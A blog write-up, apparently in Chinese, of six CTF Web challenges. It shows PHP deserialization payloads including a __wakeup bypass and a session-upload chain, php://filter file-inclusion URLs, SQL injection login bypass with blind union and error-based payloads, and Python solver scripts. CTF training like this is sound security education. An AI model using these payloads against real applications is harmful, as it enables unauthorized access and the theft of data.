当前位置:   article > 正文

i春秋网络内生安全试验场CTF夺旗赛(第二季)部分Web题WriteUp_ctf夺旗赛找flag 文件包含0

ctf夺旗赛找flag 文件包含0

1.easyphp

地址:http://120.55.43.255:13005/

打开后查看源码,发现show.php。

 

该地址后有一个base64字符串,解码后内容为:hint.jpg

将首页地址index.php编码后,放到show.php可看到注释掉的php源码。

分析改源码可知,此题为反序列化的题,我们需要构造一个反序列化字符串的payload,通过class参数传入,使其可以执行unserialize函数,并保存到$x变量中。

继续编码hint.php,访问show.php可看到hint.php页面的源码。

该源码注释部分提示flag在flag.php中,分析该源码show_source表示高亮显示php源码,结合上面的反序列化代码,我们要做的就是序列化hint对象,并且可将file变量置为flag.php,就可以高亮显示flag.php源码,但是一个字符串反序列化后为执行__wakeup函数,该函数固定将file设置为index.php,必须想办法使其不执行__wakeup函数,构造一个正常的反序列化字符串为:O:4:"hint":1:{s:4:"file";s:8:"flag.php";},其中hint:1表示该对象有1个属性,此时我们将1改成2,后面依然写一个属性,执行反序列化函数后,将不会执行__wakeup函数。

2.calculate2

地址:http://120.55.43.255:13002/

打开页面后,是一个数学四则运算。提示输入10次正确答案后可获得flag。

输入正确的答案后跳转到另一个页面。

他提示请在3秒内输入答案,这次再次刷新该页面,回答次数并没有增加,我们手动计算不可能3秒内提交上正确答案,这次考虑用脚本去执行。

  1. import time
  2. from bs4 import BeautifulSoup as BS
  3. import requests
  4. def fun():
  5. url = "http://120.55.43.255:13002/"
  6. headers = {
  7. 'Cookie':'PHPSESSID=se9bksbg4plk5blhvgmbb9jjm1'
  8. }
  9. req = requests.get(url,headers=headers)
  10. a = ''
  11. divs = BS(req.content,'html.parser')
  12. for div in divs.find_all('div'):
  13. print div.get_text()
  14. a += div.get_text()
  15. a = a[:-1]
  16. a = 'res = ' + a
  17. exec(a)
  18. print res
  19. data = {'ans':res}
  20. time.sleep(1)
  21. req2 = requests.post(url,headers=headers,data=data)
  22. print req2.content
  23. if __name__ == '__main__':
  24. i = 0
  25. while (i<9):
  26. fun()
  27. i = i +1

 

3.best_language1

地址:http://120.55.43.255:13006/

打开地址后,是一个源码审计的题。

分析改题目,首先需要传入name,获得secret_key,name和secret_key放到一个数组中循环,经过两次赋值后,需要拿到key,name只能传入%s,才能保证第二次循环%s被替换成真正的secret_key。

拿到key后继续分析,$first变量默认为"aa",要执行后面的语句,需要将first设置为"u",仔细看里面的循环语句,当i===1时,将$_GET的第一个参数的值$value赋值给

key
,也就是$key如果为first,那么$$就是$first,这是就可以改变$first的值。

注意first参数必须在第一个,因为i===1时才触发。

这时,下一个难题是改变ccc的值为F1ag(不是Flag,我第一次做的时候写Flag,始终不对,过了很久才看出来是F1ag)。我们可以注意到call_user_func函数,可以利用该函数去调用另一个函数,并重新给ccc赋值,php的extract函数就可实现该效果,于是构造payload为:http://120.55.43.255:13006/?first=u&&key=th3_k3y_y0u_cann0t_guess2333&function=extract&ccc=F1ag

再次分析上面的源码发现,他调用了include函数,可以考虑文件包含,拿到class.php的源码。

解码上面的base64,可拿到class.php的源码。

通过分析源码,可以知道考查的是通过session触发反序列化,执行流程时实例化Monitor对象,在__destruct中执行Welcome对象,通过Welcome再次调用Come,使其执行execute函数。

我们可以用php的PHP_SESSION_UPLOAD_PROGRESS机制。首先构造本地表单如:

  1. <form action="class.php"method="POST"enctype="multipart/form-data">
  2. <input type="hidden"name="PHP_SESSION_UPLOAD_PROGRESS"value="123"/>
  3. <input type="file"name="file"/>
  4. <input type="submit"/>
  5. </form>

 

打开BurpSuit,随便上传一个文件,构造反序列化字符串,用BurpSuit将filename改成该字符串,再次执行。

构造反序列化字符串为:|O:7:"Monitor":1:{s:4:"test";O:7:"Welcome":2:{s:3:"obj";O:4:"Come":2:{s:6:"method";s:7:"get_dir";s:4:"args";a:1:{i:0;s:43:"/....//....//....//....//....//var/www/html";}}s:3:"var";s:7:"success";}}

此时,再次利用文件包含可获得flag。

http://120.55.43.255:13006/?first=u&key=th3_k3y_y0u_cann0t_guess2333&function=extract&ccc=F1ag&file=php://filter/read=convert.base64-encode/resource=7his_1s_F1aG

4.babysql

地址:http://120.55.43.255:13004

打开地址后是个登录页面,随便输入用户名密码,提示Flag就是admin的密码,第一反应是需要盲注admin的密码,猜测sql语句是:

select * from user where username = '$username' and passwd = '$passwd',可以考虑闭合单引号,username为\,passwd为||1#,构造后的sql语句为:select * from user where username '\' and passwd = '||1#',这时他返回

说明用户表第一个用户为visitor,并且可以注入,我们需要的是admin,可以猜测admin应该在后面的数据中,passwd构造||id>1#,此时返回了admin。说明admin在第二条数据,但是我们要猜测密码,后面构造带有passwd的字符串,提示hacker,发现他将passwd拦截了,后面构造|| id> 1 union select 1,1,1#,返回了admin,发现union select可以用,此时我们可用利用union select 盲注密码,猜测passwd字符在sql语句的第三列,构造payload为:|| id > 1 union select 1,1,'f' order by 3 asc#,上述根据第三列(也就是密码列)排序,每个字符从'f'倒叙盲注,如果返回admin,说明密码对应为比他小,继续往前一个字符猜,直到为1,该字符就位对应密码的当前位,依次类推,直到最后一个字符(最后一个字符取当前猜测到的字符的后面一位),最终猜到的密码为:c591cd7aa9882549c96ccd7de997633d。

(我没有准备python脚本,为手工盲注,一共32个字符,各位看官可根据思路自行写python脚本,哈哈)

5.calculate1

地址:http://120.55.43.255:13001/

该题目和calculate2类似,python脚本如下:

  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-
  3. import requests
  4. from bs4 import BeautifulSoup
  5. import time
  6. def fun():
  7. headers = {
  8. 'Cookie':'PHPSESSID=8cb3ilih9se2sm6onjkbo8ljf2'
  9. }
  10. get = requests.get("http://120.55.43.255:13001/",headers=headers)
  11. content = get.content
  12. soup=BeautifulSoup(content,"html.parser")
  13. text = soup.form.find_all(text=True)[0].replace('\r','').replace('\n','')
  14. one = int(text[0:3])
  15. two = int(text[4:7])
  16. op = text[3:4]
  17. result = 0
  18. if(op == '+'):
  19. result = one + two
  20. elif(op == '-'):
  21. result = one - two
  22. elif(op == '*'):
  23. result = one * two
  24. else:
  25. result = one / two
  26. print result
  27. time.sleep(1)
  28. post = requests.post('http://120.55.43.255:13001/',data={'ans':result},headers=headers)
  29. print post.content
  30. if __name__ == '__main__':
  31. i = 0
  32. while (i<10):
  33. fun()
  34. i = i +1

6.easysql

地址:http://120.55.43.255:13003

打开地址后,提示id is not in whitelist,顺手输入http://120.55.43.255:13003?id=1,出现了查询数据。

考虑sql注入,发现union or concat select insert update等关键词均被过滤,随便输入一个字符,发现有报错,考虑报错注入。

报错注入一般是updatexml和extractvalue两个函数,于是,构造payload为:and updatexml(1,make_set(1|2,0x3c,(SELECT flag from flag),0x7e),1)或者and extractvalue(1,make_set(1|2,0x3c,(select flag from flag)))。

报错注入 一次无法将所有flag字符串爆出来,需要用到substr函数分两次爆。

 

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/小蓝xlanll/article/detail/673625
推荐阅读
相关标签
  

闽ICP备14008679号